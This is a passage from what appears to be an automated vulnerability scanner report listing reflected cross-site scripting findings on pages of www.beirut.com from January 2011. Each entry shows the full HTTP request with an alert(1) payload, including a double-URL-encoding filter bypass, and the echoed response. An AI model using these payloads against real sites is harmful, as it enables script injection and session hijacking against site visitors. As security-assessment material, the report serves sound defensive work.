<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=JustForKids&listingtype=justforkids.php&Types=14-eventdf290"><script>alert(1)</script>1d5624aa6d5">
...[SNIP]...

4.550. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ad'-alert(1)-'ed30901e052 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /JustForKids973ad'-alert(1)-'ed30901e052/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='JustForKids973ad'-alert(1)-'ed30901e052';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.551. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867d5"><a>a2aa381f760 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids867d5"><a>a2aa381f760/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids867d5"><a>a2aa381f760">
...[SNIP]...

4.552. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Recreation-and-Fun/11-locale

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848ee228d11 was submitted in the REST URL parameter 3. This input was echoed as 700f9"><script>alert(1)</script>848ee228d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /JustForKids/Recreation-and-Fun/11-locale700f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e848ee228d11 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=JustForKids&listingtype=justforkids.php&Types=11-locale700f9"><script>alert(1)</script>848ee228d11">
...[SNIP]...

4.553. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b265"><a>ad10578e158 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKids5b265"><a>ad10578e158/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:16:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKids5b265"><a>ad10578e158">
...[SNIP]...

4.554. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde6d'-alert(1)-'4255c5d89e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /JustForKidscde6d'-alert(1)-'4255c5d89e2/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='JustForKidscde6d'-alert(1)-'4255c5d89e2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.555. http://www.beirut.com/JustForKids/Shops/8-locale [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Shops/8-locale

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d4876ec01c was submitted in the REST URL parameter 3. This input was echoed as fe0e2"><script>alert(1)</script>3d4876ec01c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /JustForKids/Shops/8-localefe0e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d4876ec01c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:29:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=JustForKids&listingtype=justforkids.php&Types=8-localefe0e2"><script>alert(1)</script>3d4876ec01c">
...[SNIP]...

4.556. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Sports/1-event

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bdf7'-alert(1)-'128f90b41cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /JustForKids3bdf7'-alert(1)-'128f90b41cd/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:23:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='JustForKids3bdf7'-alert(1)-'128f90b41cd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.557. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/JustForKids/Sports/1-event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb9e0"><a>9dd7ca5e8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /JustForKidsbb9e0"><a>9dd7ca5e8d/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:13:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="JustForKidsbb9e0"><a>9dd7ca5e8d">
...[SNIP]...

4.558. http://www.beirut.com/JustForKids/Sports/1-event [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/JustForKids/Sports/1-event

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1beb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45540681358 was submitted in the REST URL parameter 3. This input was echoed as 1beb1"><script>alert(1)</script>45540681358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /JustForKids/Sports/1-event1beb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e45540681358 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:34:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=JustForKids&listingtype=justforkids.php&Types=1-event1beb1"><script>alert(1)</script>45540681358">
...[SNIP]...

4.559. http://www.beirut.com/Movies [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b593'-alert(1)-'8865ccc3e21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies4b593'-alert(1)-'8865ccc3e21 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies4b593'-alert(1)-'8865ccc3e21';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.560. http://www.beirut.com/Movies [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0d6"><a>1c13d275cd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies7f0d6"><a>1c13d275cd3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies7f0d6"><a>1c13d275cd3">
...[SNIP]...

4.561. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f5f"><a>5d1b1f40a8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies56f5f"><a>5d1b1f40a8b/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:34:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies56f5f"><a>5d1b1f40a8b">
...[SNIP]...

4.562. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26b89'-alert(1)-'ed4f110a366 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Movies26b89'-alert(1)-'ed4f110a366/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:42:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Movies26b89'-alert(1)-'ed4f110a366';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.563. http://www.beirut.com/Movies/Cinemas/Dunes/1083 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Dunes/1083

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d8a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2386c42c93 was submitted in the REST URL parameter 4. This input was echoed as a8d8a"><script>alert(1)</script>a2386c42c93 in the application's response.

